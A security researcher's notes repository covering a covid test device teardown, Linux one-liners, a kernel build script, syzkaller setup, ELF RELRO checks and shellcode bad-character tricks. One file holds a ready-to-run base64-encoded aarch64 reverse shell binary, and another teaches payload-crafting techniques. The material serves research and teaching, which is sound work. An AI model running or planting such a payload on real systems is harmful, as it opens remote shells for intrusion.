├── LICENSE
├── README.md
├── hardware
    └── ellume_covid_test_teardown.md
├── linux
    ├── ansi.md
    ├── elf
    │   ├── aarch64_reverse_shell.md
    │   └── relro.md
    ├── lkbuild.sh
    ├── multiarch_crosscompiling.md
    ├── oneliners.md
    ├── syzkaller_setup.md
    └── vim_hex_editor.md
├── programming
    └── shellcodetricks.md
├── protocols
    ├── list_protos.sh
    ├── pcap_format.md
    └── wiresharktips.md
├── re
    ├── ghidra_setup.md
    ├── string_representation.md
    └── timestamps.md
├── sysadmin
    ├── matrix_synapse.md
    └── matrix_tokenstore.py
└── themes
    ├── darkmode.md
    └── prompts.md


/LICENSE:
--------------------------------------------------------------------------------
Copyright (c) 2023 netspooky

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# notes

I'm using this repo to keep track of little notes, tips and tricks, and other stuff that I've shown people or found. Take everything here with a grain of salt.

--------------------------------------------------------------------------------
/hardware/ellume_covid_test_teardown.md:
--------------------------------------------------------------------------------
# Ellume Covid Test Teardown

_Originally Posted: [2021-07-21](https://twitter.com/netspooky/status/1417721950881959938)_

I bought one of these today because I needed to take a test. It was the only one at CVS and it was disappointing because it required me to link with a phone to get my results. Let's see what's inside:

![image](https://user-images.githubusercontent.com/26436276/209997590-19cfbbca-b4a6-43cf-9806-41caf2818127.png)

The test itself is pretty standard. You do the nose thing, dip in some fluid, then squirt into The Hole. Pair with your phone and some weird app with weird reviews, and boom, helth

![image](https://user-images.githubusercontent.com/26436276/209997632-c4ff6d59-f0f6-46b0-abe1-2f06c99b65d5.png)

You can very easily pry it apart with a screwdriver, revealing a small board with a plastic housing attached, and a lil coin battery

![image](https://user-images.githubusercontent.com/26436276/209997679-af82caa0-401a-4059-8f56-2f39f43f6380.png)

Pop off the housing to reveal that it's just a test strip being read by some circuit that shines light and reads the strip. It's pretty straightforward, but also annoying that this whole contraption was $40USD and required me to download an app and give them all my info.

![image](https://user-images.githubusercontent.com/26436276/209997714-67ec3f5e-d1fb-4def-a378-d26d906ff08a.png)

![image](https://user-images.githubusercontent.com/26436276/209997719-dfd2a4c6-4a72-4b4e-b95f-010fd2870dca.png)

On the plus side, you do get a nice Nordic Semiconductor nRF52810 and test pads to reprogram it if you want to play around with BLE. It's got an ARM Cortex M4 and a 2.4 GHz transceiver. It's a shame it's meant to be thrown away; you can have a lot of fun with this.

![image](https://user-images.githubusercontent.com/26436276/209998039-b2232172-9008-402f-b7ba-3d211eb9e2ca.png)

tl;dr - You can rip the test strip out instead of giving your data to some dodgy company, and you get a BLE SoC to mess around with.

Also I tested negative 🎉

For those wondering, here is the backside of the board. So many test pads! Also I labeled the main test pads near the battery after tracing from the datasheet if you want to reprogram using SWD. Have fun!

![image](https://user-images.githubusercontent.com/26436276/209997784-1f101ad6-64f7-4d61-997c-518c1f1e4b84.png)

![image](https://user-images.githubusercontent.com/26436276/209997793-c9787707-93d1-4b74-8343-210326553f82.png)

![image](https://user-images.githubusercontent.com/26436276/209997807-43323e00-c79b-468f-87b4-ed66146f2f82.png)

Additionally, [black0wl](https://twitter.com/b1ack0wl/status/1417991582444310528) found that there's some funky stuff going on on the company's website that probably came from a vulnerable WordPress plugin.

![image](https://user-images.githubusercontent.com/26436276/209997902-d2dae350-aabf-4e16-bd8a-95780ae315bc.png)

Also someone else did a more in-depth teardown here: https://routevegetable.com/covid-test-2/

--------------------------------------------------------------------------------
/linux/ansi.md:
--------------------------------------------------------------------------------
Oneliner to clear the screen `echo -ne "\x1b\x5b\x48\x1b\x5b\x32\x4a\x1b\x5b\x33\x4a"`

As base64 `base64 -d <<< G1tIG1syShtbM0o=`

This also does this, but it's shorter and it's supposed to work on older systems.
`echo -ne "\x1bc"`

hahaha `base64 -d <<< G2N1` clears the screen and puts a u at the top left

This clears and puts U's til the end of the console line `base64 -d <<< G2NVG1s5OTli`

--------------------------------------------------------------------------------
/linux/elf/aarch64_reverse_shell.md:
--------------------------------------------------------------------------------
# 208 byte aarch64 ELF reverse shell

Originally posted 2022-11-16

Reverse shell, connects back to 127.0.0.1:1234

Base64 (280 characters)
```
f0VMRsgYgNICAIDSAgAAFAIAtwAhAIDSBAAAFAAAAABAAAAAAAAAAEAAgNIBAADUCgAAFE
AAOAABAAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAAAUAAAAAOMDACoFAAAUABAAAAAAAAAA
EAAAAAAAAGgZgNICAoDSQQCA0oFAuvLhD8DyASDg8uEPH/jhAwCRAQAA1AgDgNJhAIDS4g
MfquADAyohBADxAQAA1IH//1SoG4DS4EWM0iDNrfLgZc7yAA3g8uADAPngAwCRAQAA1A==
```

Running on a raspberry pi 4 with the latest kernel

![two terminals, one loading the base64 into a file called nice.bin and executing it, and another terminal catching the reverse shell and running ls to show the size of the binary](https://user-images.githubusercontent.com/26436276/209994747-bd16dde4-342f-4f34-afff-24bcd37b7409.png)

I was playing with automatically encoding certain aarch64 instructions so I can script out certain payloads and this was my PoC. It's a bit trickier to encode bc of how aarch64 is packed but it's not that crazy.

![a python function that encodes IP and Port values and places them in instruction templates and returns the buffer of bytes](https://user-images.githubusercontent.com/26436276/209994818-3adac183-72b2-495e-b23c-8ab71ff35142.png)

I made this little diagram to explain aarch64 instruction encoding. Each instruction is movk x1, somevalue, some shift here. But you can see things like where in x1 the value is placed (denoted by the shift or hw field) and then the immediate value which is highlighted in orange.
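
The field layout described above, read in the other direction, is useful when triaging a sample: the following added example (not code from this repo) decodes MOVN/MOVZ/MOVK words and replays them to recover the constant a register ends up holding. The function names and the four sample words are constructed for illustration; the words build an AF_INET sockaddr for 127.0.0.1:1234, the endpoint this PoC connects to.

```python
import socket
import struct

# A64 "move wide (immediate)" class: bits 28..23 are 100101.
# Layout: sf[31] opc[30:29] 100101[28:23] hw[22:21] imm16[20:5] Rd[4:0]
MOVE_WIDE = {0b00: "movn", 0b10: "movz", 0b11: "movk"}


def decode_move_wide(word):
    """Return the fields of a MOVN/MOVZ/MOVK word, or None for anything else."""
    if (word >> 23) & 0x3F != 0b100101:
        return None
    op = MOVE_WIDE.get((word >> 29) & 0x3)
    sf, hw = word >> 31, (word >> 21) & 0x3
    if op is None or (sf == 0 and hw > 1):  # opc=01 and 32-bit hw>=2 are unallocated
        return None
    return {"op": op, "sf": sf, "shift": hw * 16,
            "imm16": (word >> 5) & 0xFFFF, "rd": word & 0x1F}


def fold_registers(code):
    """Replay move-wide writes over little-endian code; return {register: value}.

    Only MOVN/MOVZ/MOVK are modelled, so a register overwritten by any other
    instruction in between goes unnoticed: treat the result as a triage hint.
    """
    regs = {}
    usable = len(code) - len(code) % 4
    for (word,) in struct.iter_unpack("<I", code[:usable]):
        f = decode_move_wide(word)
        if f is None:
            continue
        width = (1 << 64) - 1 if f["sf"] else (1 << 32) - 1
        chunk = f["imm16"] << f["shift"]
        if f["op"] == "movz":
            value = chunk
        elif f["op"] == "movn":
            value = ~chunk & width
        else:  # movk keeps every bit outside its 16-bit slot (unknown prior state = 0)
            value = (regs.get(f["rd"], 0) & ~(0xFFFF << f["shift"]) & width) | chunk
        regs[f["rd"]] = value
    return regs


def as_sockaddr_in(value):
    """Interpret a 64-bit register constant as the first 8 bytes of a sockaddr_in."""
    raw = struct.pack("<Q", value)
    (family,) = struct.unpack_from("<H", raw, 0)   # host order on little-endian
    (port,) = struct.unpack_from(">H", raw, 2)     # network order
    return family, socket.inet_ntoa(raw[4:8]), port


# Constructed sample words:
#   movz x1, #0x2
#   movk x1, #0xd204, lsl #16
#   movk x1, #0x7f,   lsl #32
#   movk x1, #0x100,  lsl #48
SAMPLE = struct.pack("<4I", 0xD2800041, 0xF2BA4081, 0xF2C00FE1, 0xF2E02001)

if __name__ == "__main__":
    for (w,) in struct.iter_unpack("<I", SAMPLE):
        print(f"{w:08x}", decode_move_wide(w))
    x1 = fold_registers(SAMPLE)[1]
    print(f"x1 = {x1:#018x} ->", as_sockaddr_in(x1))
```
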

![listing of aarch64 instructions with annotated bits](https://user-images.githubusercontent.com/26436276/209994890-b086b2cf-a306-46bf-ba8c-80f6568b4c3e.png)

The encoding is different for each class of instructions, but you'll have to read the instruction set docs for full explanation of each. Just wanted to show what goes into encoding an instruction for those curious.

--------------------------------------------------------------------------------
/linux/elf/relro.md:
--------------------------------------------------------------------------------
# ELF RELRO
From 2022-09-21

### Question
How do you verify if a binary is compiled with RELRO? What do all the flags mean?

### Answer

The docs and online discussions about this are super confusing. The whole point of doing RELRO is to set RTLD_NOW when the linker calls [dlopen](https://man7.org/linux/man-pages/man3/dlopen.3.html) in some way. This tells the linker to resolve everything before execution (this actually happens before dlopen returns) and map the area the GOT is in as read-only.

This can be done in a few ways:
- DT_BIND_NOW - A .dynamic section tag that explicitly sets this flag.
- DF_BIND_NOW - A flag within the DT_FLAGS tag in the .dynamic section.
- DF_1_NOW - A flag within DT_FLAGS_1, another .dynamic tag.
- LD_BIND_NOW - This environment variable being a non-empty string will also trigger this.

Since these are linker instructions, there's nothing stopping a linker from either not supporting something, or ignoring the tag altogether.

The best way to verify is to run the binary on the target system and check the memory permissions for the area that the GOT is in. If it's marked read only, then it was a success.
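
One way to script that comparison, as an added example (not code from this repo): it reads what the file claims (the `PT_GNU_RELRO` range and the three `.dynamic` markers listed above) and checks it against the permissions in a `/proc/<pid>/maps` listing. The ELF skeleton, the maps text, the path `/opt/demo/app` and all function names are constructed for illustration; it assumes little-endian ELF64 and 4 KiB pages.

```python
import struct

PT_LOAD, PT_DYNAMIC, PT_GNU_RELRO, DT_NULL = 1, 2, 0x6474E552, 0
# (name, dynamic tag, flag bit or None when the tag's presence is enough)
BIND_NOW_MARKERS = (("DT_BIND_NOW", 24, None), ("DF_BIND_NOW", 30, 0x8),
                    ("DF_1_NOW", 0x6FFFFFFB, 0x1))
PAGE = 0x1000  # assumption: 4 KiB pages on the target

def program_headers(elf):
    """Yield (type, offset, vaddr, filesz, memsz) from a little-endian ELF64 image."""
    if elf[:6] != b"\x7fELF\x02\x01":
        raise ValueError("only little-endian ELF64 is handled in this example")
    (phoff,) = struct.unpack_from("<Q", elf, 0x20)
    phentsize, phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(phnum):
        p_type, _, off, vaddr, _, filesz, memsz, _ = struct.unpack_from(
            "<IIQQQQQQ", elf, phoff + i * phentsize)
        yield p_type, off, vaddr, filesz, memsz

def static_claims(elf):
    """What the file asks for: the PT_GNU_RELRO range and any BIND_NOW markers.

    LD_BIND_NOW is an environment variable, so it never shows up here.
    """
    relro, markers = None, []
    for p_type, off, vaddr, filesz, memsz in program_headers(elf):
        if p_type == PT_GNU_RELRO:
            relro = (vaddr, vaddr + memsz)
        elif p_type == PT_DYNAMIC:
            size = min(filesz, max(len(elf) - off, 0)) // 16 * 16
            for tag, val in struct.iter_unpack("<qQ", elf[off:off + size]):
                if tag == DT_NULL:
                    break
                for name, want, bit in BIND_NOW_MARKERS:
                    if tag == want and (bit is None or val & bit):
                        markers.append(name)
    return relro, markers

def live_mappings(elf, maps_text, path):
    """Mappings of a running process that overlap the range the loader should protect."""
    relro, _ = static_claims(elf)
    if relro is None:
        return []
    off0, vaddr0 = min(((off, va) for t, off, va, _, _ in program_headers(elf)
                        if t == PT_LOAD), key=lambda load: load[1], default=(0, 0))
    rows = []
    for line in maps_text.splitlines():
        f = line.split(None, 5)
        if len(f) >= 5:
            start, end = (int(x, 16) for x in f[0].split("-"))
            rows.append((start, end, f[1], int(f[2], 16),
                         f[5].strip() if len(f) > 5 else ""))
    bases = [s for s, _, _, o, p in rows if p == path and o == (off0 // PAGE * PAGE)]
    if not bases:
        raise ValueError(f"{path} is not mapped in this process")
    bias = min(bases) - vaddr0 // PAGE * PAGE
    # Whole pages are protected: both ends are rounded down, as the glibc loader does.
    lo = (relro[0] + bias) // PAGE * PAGE
    hi = (relro[1] + bias) // PAGE * PAGE
    return [(s, e, perms) for s, e, perms, _, _ in rows if s < hi and e > lo]

def verdict(elf, maps_text, path):
    """Compare what the file claims with what the kernel reports for the process."""
    relro, markers = static_claims(elf)
    live = live_mappings(elf, maps_text, path)
    return {"claims_relro": relro is not None,
            "bind_now_markers": markers,
            "writable_at_runtime": any("w" in perms for _, _, perms in live),
            "mappings": [(hex(s), hex(e), perms) for s, e, perms in live]}

def sample_elf():
    """Constructed ELF64 skeleton: headers and .dynamic only, not a runnable program."""
    dyn = struct.pack("<qQqQqQ", 30, 0x8, 0x6FFFFFFB, 0x1 | 0x08000000, DT_NULL, 0)
    phdrs = [(PT_LOAD, 0, 0, 0x1000, 0x1000),
             (PT_DYNAMIC, 0x200, 0x3DF8, len(dyn), len(dyn)),
             (PT_GNU_RELRO, 0x200, 0x3DB8, 0x248, 0x248)]
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", b"\x7fELF\x02\x01\x01", 3, 62, 1,
                       0, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, 4, off, va, va, fs, ms, PAGE)
                    for t, off, va, fs, ms in phdrs)
    return (ehdr + body).ljust(0x200, b"\0") + dyn

# Constructed /proc/<pid>/maps excerpts: one where the loader applied RELRO, one where it did not.
MAPS_ENFORCED = """\
555555554000-555555555000 r--p 00000000 08:01 1234 /opt/demo/app
555555555000-555555556000 r-xp 00001000 08:01 1234 /opt/demo/app
555555557000-555555558000 r--p 00002000 08:01 1234 /opt/demo/app
555555558000-555555559000 rw-p 00003000 08:01 1234 /opt/demo/app
"""
MAPS_NOT_ENFORCED = MAPS_ENFORCED.replace("557000-555555558000 r--p",
                                          "557000-555555558000 rw-p")

if __name__ == "__main__":
    for label, maps in (("enforced", MAPS_ENFORCED), ("ignored", MAPS_NOT_ENFORCED)):
        print(label, verdict(sample_elf(), maps, "/opt/demo/app"))
```

Against a real process, pass the bytes of the binary on disk, the contents of `/proc/<pid>/maps`, and the binary's path exactly as it appears in that listing.
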

Trusting tools like readelf or checksec can lead to a false sense of security, as they can be easily manipulated via maliciously crafted ELFs, or with linker/compiler/runtime bugs that can lead to weird outcomes.

--------------------------------------------------------------------------------
/linux/lkbuild.sh:
--------------------------------------------------------------------------------
#!/bin/bash

LKBUILDVERS="20221129.1"
### LKBUILD.SH -------------------------------------------------------------------------------------
#
# This script will do the following:
# - Build the Linux kernel with specified Kconfig options (in kConf variable)
# - Build a Debian image of this kernel
# - Boot the kernel using qemu
#
# --------------------------------------------------------------------------------------------------
# .: Host Setup :.
#
# - Assuming you are using Ubuntu or other Debian flavored distro, this will install what you need
#   for the build system, creating debian images, and installing qemu
#     $ sudo apt update
#     $ sudo apt install make gcc flex bison libncurses-dev libelf-dev libssl-dev
#     $ sudo apt install debootstrap
#     $ sudo apt install qemu-system-x86
# - More info on how to setup using syzkaller options: https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md
#
# --------------------------------------------------------------------------------------------------
# .: Script Setup :.
#
# - Create a directory called ~/kernel/ and cd into it
# - Grab create-image.sh from syzkaller, this is used to create a debian image
#   (use the raw URL; the github.com/.../blob/... URL returns an HTML page, not the script)
#     $ wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh
# - PROTIP: Change the hostname variable in this script to whatever you want.
#   Default is "syzkaller"
# - Clone your kernel image and cd into it
#     $ git clone --branch v5.15 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
# - Alternatively you can download the tarball of your desired kernel version from the cdn.
#     https://cdn.kernel.org/pub/linux/kernel/
# - Copy this script to the root of your linux kernel source
# - Update the config options below
# - Run this script
#
# --------------------------------------------------------------------------------------------------
# .: Interacting with your kernel :.
#
# - The kernel will be booted using qemu. Log in with the username root and default creds.
# - The create-image script will generate keys for you
# - Put this into your ~/.ssh/config file, change the IdentityFile to wherever your kernel's debimg folder is.
#     Host qemu
#         HostName localhost
#         User root
#         Port 10021
#         IdentityFile ~/kernel/linux_5.15/debimg/stretch.id_rsa
#         StrictHostKeyChecking no
# - Now you can ssh into your kernel by doing:
#     $ ssh qemu
# - You can scp files by doing
#     $ scp myfile.bin qemu:
#
# --------------------------------------------------------------------------------------------------
# .: Other Tips :.
#
# REBUILD
#
# - If you want to rebuild your kernel, run this in the root of your Linux directory:
#     $ make clean
#
# DEBUG
#
# - This script was written to generate kernels you can debug with gdb.
# - The gdb script you need is in $KERNEL/scripts/gdb/
# - Add this to your ~/.gdbinit file, changing the path to your kernel.
#     add-auto-load-safe-path /home/user/kernel/linux_5.15/scripts/gdb/vmlinux-gdb.py
# - To debug the kernel, do this:
#     $ cd /path/to/your/kernel/
#     $ gdb ./vmlinux
#     (gdb) lx-symbols
#     (gdb) target remote :1234
# - Now you are debugging the kernel!
# - More info here: https://docs.kernel.org/dev-tools/gdb-kernel-debugging.html
#
# --------------------------------------------------------------------------------------------------

### Config Options #################################################################################
KERNEL="/home/user/kernel/linux_5.15" # This is where the kernel was cloned
IMAGE="$KERNEL/debimg"                # This is where the debian image will live.

# Put all the kconfig options in here
# For more info on these check out this site: https://cateee.net/lkddb/web-lkddb/DEBUG_KMEMLEAK.html
kConf=$(cat <<-END
CONFIG_CONFIGFS_FS=y
CONFIG_DEBUG_FS=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_KMEMLEAK=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
CONFIG_KCOV=y
CONFIG_KCOV_ENABLE_COMPARISONS=y
CONFIG_KCOV_INSTRUMENT_ALL=y
CONFIG_SECURITYFS=y
CONFIG_SLAB_DEBUG=y
CONFIG_USER_NS=y
CONFIG_FRAME_POINTER=y
CONFIG_DEBUG_KERNEL=y
CONFIG_GDB_SCRIPTS=y
\n
END
)

### End Config Options #############################################################################

echo "---------------------------------" >> ~/kernel/build.log
echo "[$(date)] Configuring $KERNEL" >> ~/kernel/build.log

echo -e "[$(date)] \x1b[38;5;51mConfiguring Kernel\x1b[0m"
make defconfig
make kvm_guest.config

# Add to .config
printf "$kConf" >> .config

make olddefconfig

echo "[$(date)] Start compilation" >> ~/kernel/build.log
echo -e "[$(date)] \x1b[38;5;51mCompiling the kernel\x1b[0m"

make -j`nproc`

echo "[$(date)] End compilation, starting image build" >> ~/kernel/build.log

mkdir debimg
cp ~/kernel/create-image.sh debimg/
cd debimg
echo -e "[$(date)] \x1b[38;5;51mBuilding the image\x1b[0m"
./create-image.sh

echo "[$(date)] End image build, booting image" >> ~/kernel/build.log
echo -e "[$(date)] \x1b[38;5;51mRunning the image\x1b[0m"

# This part creates a runk.sh script and runs the image in qemu for us. The script is reusable
# (written with > so a second run of lkbuild.sh replaces runk.sh instead of appending to it)

cat << EOF > runk.sh
#!/bin/bash

KERNEL="$KERNEL"
IMAGE="$IMAGE"

qemu-system-x86_64 \\
  -m 2G \\
  -smp 2 \\
  -kernel \$KERNEL/arch/x86/boot/bzImage \\
  -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0 nokaslr" \\
  -drive file=\$IMAGE/stretch.img,format=raw \\
  -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \\
  -net nic,model=e1000 \\
  -nographic \\
  -enable-kvm \\
  -cpu host \\
  -s \\
  -pidfile vm.pid \\
  2>&1 | tee vm.log
EOF

chmod +x runk.sh
./runk.sh

--------------------------------------------------------------------------------
/linux/multiarch_crosscompiling.md:
--------------------------------------------------------------------------------
Notes relevant to multiarch and cross compiling

# Setting up 32bit ARM on aarch64

Let's say you see something like this
```
pi@rpi4:~/ $ ./myBin
./myBin: error while loading shared libraries: myLib.so: wrong ELF class: ELFCLASS64
```
If you want to install armhf on an aarch64 system (eg raspbian on raspberry pi 4), do this:
```
sudo dpkg --add-architecture armhf
sudo apt install libc6:armhf
```
This adds the option to use this arch via dpkg. Then installing the armhf version of libc6 will allow you to use libraries as the linker for libc is now available (as well as the standard library)

--------------------------------------------------------------------------------
/linux/oneliners.md:
--------------------------------------------------------------------------------
There's so many one liners I forget, so I will put them here.

### Misc Useful
Find duplicate files
```
find . ! -empty -type f -exec md5sum {} + | sort | uniq -w32 -dD
```
Extract all zip files in current directory
```
find . -name "*.zip" -exec mkdir {}_ \; -exec mv {} {}_/ \; -exec 7z x {}_/{} -o{}_/ \;
```
generate uuid
```
cat /proc/sys/kernel/random/uuid
```
How to use USBPCAP on Ubuntu
```
sudo modprobe usbmon
sudo setfacl -m u:$USER:r /dev/usbmon*
```
Disable system beep
```
rmmod pcspkr ; echo "blacklist pcspkr" >>/etc/modprobe.d/blacklist.conf
```

### Vim, Regex, Grep

remove trailing whitespace regex
```
[^\S\r\n]+$
```
How to remove all lines containing value REMOVEME
```
^.*REMOVEME.*\n
```
Vim: Remove all blank lines in a file
```
:g/^$/d
```
Find all memcpy instances in a dir (with line numbers)
```
grep --color -rin memcpy .
```

### Hex Stuff
Here's a tutorial I made about using Vim as a hex editor: https://twitter.com/netspooky/status/1553047692678414337

copy intel hex format to bin
```
objcopy -I ihex file.hex -O binary file.bin
```
reverse hex dump
```
cat asciihex.txt | xxd -r -p > file.bin
```
base64 to bin
```
base64 -d <<< someb64here > file.bin
```
perl hexdump
```
perl -e 'local $/; print unpack "H*", <>' file.bin
```
convert hex value to decimal
```
printf "%d\n" $((16#6132387a))
```

### Tshark and Wireshark

Convert a packet to binary from the command line
```
tshark -x -r file.pcap -Y "frame.number==[packet#]" | xxd -r > file.bin
```
tshark find byte patterns
```
tshark -r some.pcap -Y 'data.data contains "\x12\x34"' -T fields -e data
```
wireshark get first 500 frames
```
frame.number < 501
```
wireshark get frames 450-500
```
frame.number < 501 and frame.number > 450
```
tshark just grab some fields (in this case grabbing `bgblink.sync1_dv` with a filter, here it's `"bgblink.command == 104 and ip.src == 127.0.0.1"`)
```
tshark -r gameboy.pcapng -Y "bgblink.command == 104 and ip.src == 127.0.0.1" -T fields -e bgblink.sync1_dv
```
tshark list all protocols in a given pcap
```
tshark -r capture.pcap -T fields -e frame.protocols | sort -u
```

--------------------------------------------------------------------------------
/linux/syzkaller_setup.md:
--------------------------------------------------------------------------------
These are my notes on setting up and running syzkaller. For a full guide check out the docs. https://github.com/google/syzkaller/blob/master/docs/linux/setup.md

Use all these at your own risk!

# Kernel config

General good kconfig options for syzkaller.

```
# Coverage collection.
CONFIG_KCOV=y

# Debug info for symbolization.
CONFIG_DEBUG_INFO=y

# Memory bug detector
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

# Required for Debian Stretch
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
```
Additional syzkaller related ones are here: https://github.com/google/syzkaller/blob/master/docs/linux/kernel_configs.md

Other useful ones
```
CONFIG_USER_NS=y
CONFIG_SLAB_DEBUG=y
```

PROTIP: To learn about any standard CONFIG option, use this website. Remove the `CONFIG_` part of the variable to search.
- eg. `CONFIG_KASAN` info: https://cateee.net/lkddb/web-lkddb/KASAN.html

# Quick Compile

Clone the branch you want. Check the releases section for tag names.
```
git clone --branch v5.17-rc5 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
cd linux
```
Now generate the configs
```
make defconfig
make kvm_guest.config
```
Add to the .config file
```
CONFIG_CONFIGFS_FS=y
CONFIG_DEBUG_FS=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_KMEMLEAK=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
CONFIG_KCOV=y
CONFIG_KCOV_ENABLE_COMPARISONS=y
CONFIG_KCOV_INSTRUMENT_ALL=y
CONFIG_SECURITYFS=y
CONFIG_SLAB_DEBUG=y
CONFIG_USER_NS=y
```
Now load up all these into your config
```
make olddefconfig
```
Finally, make the kernel image
```
make -j`nproc`
```
Now you have to create a debian image. You can use https://github.com/google/syzkaller/blob/master/tools/create-image.sh to make one with a stock config.
```
mkdir debimg
cp ~/kernel/create-image.sh debimg/
cd debimg
./create-image.sh
```

# Running your image
Definitely follow the guide for more info, but generally you want to set up a few things in your config. Namely the workdir, the kernel objects, and the keys.

```
{
    "name": "Hello",
    "target": "linux/amd64",
    "http": "0.0.0.0:56741",
    "workdir": "/home/user/syzkaller/workdir",
    "kernel_obj": "/home/user/kernel/linux/",
    "image": "/home/user/kernel/5.17-rc5/linux/debimage/stretch.img",
    "sshkey": "/home/user/kernel/5.17-rc5/linux/debimage/stretch.id_rsa",
    "syzkaller": "/home/user/syzkaller",
    "procs": 8,
    "type": "qemu",
    "reproduce": true,
    "suppressions": [
        "no output from test machine"
    ],
    "vm": {
        "count": 4,
        "kernel": "/home/user/kernel/5.17-rc5/linux/arch/x86/boot/bzImage",
        "cpu": 2,
        "mem": 2048
    }
}
```
Finally you can run with qemu
```
qemu-system-x86_64 \
  -m 2G \
  -smp 2 \
  -kernel /home/user/kernel/5.17-rc5/linux/arch/x86/boot/bzImage \
  -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
  -drive file=/home/user/kernel/5.17-rc5/linux/debimage/stretch.img,format=raw \
  -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
  -net nic,model=e1000 \
  -enable-kvm \
  -nographic \
  -pidfile vm.pid \
  2>&1 | tee vm.log
```
Now you can connect to the running kernel with
```
ssh -i ~/kernel/5.17-rc5/linux/debimg/stretch.id_rsa -p 10021 root@127.0.0.1
```
Transfer files:
```
scp -i ~/kernel/5.17-rc5/linux/debimg/stretch.id_rsa -P 10021 stupid_bug.c root@127.0.0.1:
```
If you're doing a lot of testing, you might need to clear your ssh keys from known_hosts if you can't connect.
```
ssh-keygen -f "/home/user/.ssh/known_hosts" -R "[127.0.0.1]:10021"
```


--------------------------------------------------------------------------------
/linux/vim_hex_editor.md:
--------------------------------------------------------------------------------
# Vim Hex Editor Tutorial

_Originally Posted 2022-07-29_

Open file, type `:%!xxd` to enter hex mode

![Vim with "This is some text", typing the command :%!xxd](https://user-images.githubusercontent.com/26436276/209995509-af56ec0e-5924-42c7-9bac-96da91ee0d27.png)

Optional - Turn on hex syntax highlighting with `:set ft=xxd`

![vim in hex editor mode, syntax highlighting done with :set ft=xxd](https://user-images.githubusercontent.com/26436276/209995529-2300f14a-d348-4678-8173-dc0fab77fce1.png)

Make changes to the hex bytes

![Making changes to the hex dump in vim](https://user-images.githubusercontent.com/26436276/209995559-ba2505a1-cd76-439b-86bb-88f1332a035b.png)

Leave hex mode with `:%!xxd -r`

![Switching out of hex mode with :%!xxd -r](https://user-images.githubusercontent.com/26436276/209995593-eb863ae7-f01b-4898-a18c-da306bca9a35.png)

Exit vim with `:call libcallnr("libc.so.6","exit",0)`

--------------------------------------------------------------------------------
/programming/shellcodetricks.md:
--------------------------------------------------------------------------------
# Shellcode Tricks

From 2021-07-02

* Solid reference https://www.felixcloutier.com/x86/index.html
* Hex Calculator https://n0.lol/hc/
* WinREPL for x86 Assembly https://github.com/zerosum0x0/WinREPL/releases/
* Online Assembler https://defuse.ca/online-x86-assembler.htm

## Avoiding bad chars

### Shifting left to avoid bad chars

Let's say you want to put 0x400 in EAX

Doing it like this yields null bytes

    b8 00 04 00 00    mov eax, 0x400
    66 b8 00 04       mov ax, 0x400

So you could do it like:

    xor eax, eax
    inc eax
    shl eax, 0x0A

But this yields a potential bad char: 0xA

Shift past the bounds of EAX and end up on the same spot by adding 32 (0x20) to your shift parameter. This works because we know that EAX is 32 bits, so adding 32 will land you in the same location.

If you have a 0x1 in EAX

    xor eax, eax
    inc eax

Any of these will give you the 0x400 you are looking for

    shl eax, 0x2a
    shl eax, 0x4a
    shl eax, 0x6a
    etc..

- SHR shifts things out of the register, so it won't work for this
- There's other ways to do this with ROR/ROL
- Shift Reference: https://www.felixcloutier.com/x86/sal:sar:shl:shr
- Similar effects can be done with multiplication instructions if needed

### Chaining SHL

You can also chain shifts and increment operations together; this can be used to build complex values.

Let's say we want 0x0A0D in EAX. To use shifts, we need to look at these values in binary

    0x0A     0x0D
    00001010 00001101

We can then take the distance between the 1's and calculate how many shifts we need to do

       0x0A────0x0D────
       0000101000001101
    2 ─────┴─┘     ││ │
    6 ───────┴─────┘│ │
    1 ─────────────┴┘ │
    2 ──────────────┴─┘

Apply this by repeatedly incrementing and shifting left:

    ;-------------; OPCODE ; EAX Value --------------------------; Description ------
    xor eax, eax  ; 31c0   ; 00000000 00000000 00000000 00000000 ; Clear EAX
    inc eax       ; 40     ; 00000000 00000000 00000000 00000001 ; Increment
    shl eax, 0x2  ; c1e002 ; 00000000 00000000 00000000 00000100 ; Shifting by 2 bits
    inc eax       ; 40     ; 00000000 00000000 00000000 00000101 ; Increment
    shl eax, 0x6  ; c1e006 ; 00000000 00000000 00000001 01000000 ; Shifting by 6 bits
    inc eax       ; 40     ; 00000000 00000000 00000001 01000001 ; Increment
    shl eax, 0x1  ; d1e0   ; 00000000 00000000 00000010 10000010 ; Shifting by 1 bit
    inc eax       ; 40     ; 00000000 00000000 00000010 10000011 ; Increment
    shl eax, 0x2  ; c1e002 ; 00000000 00000000 00001010 00001100 ; Shifting by 2 bits
    inc eax       ; 40     ; 00000000 00000000 00001010 00001101 ; Increment

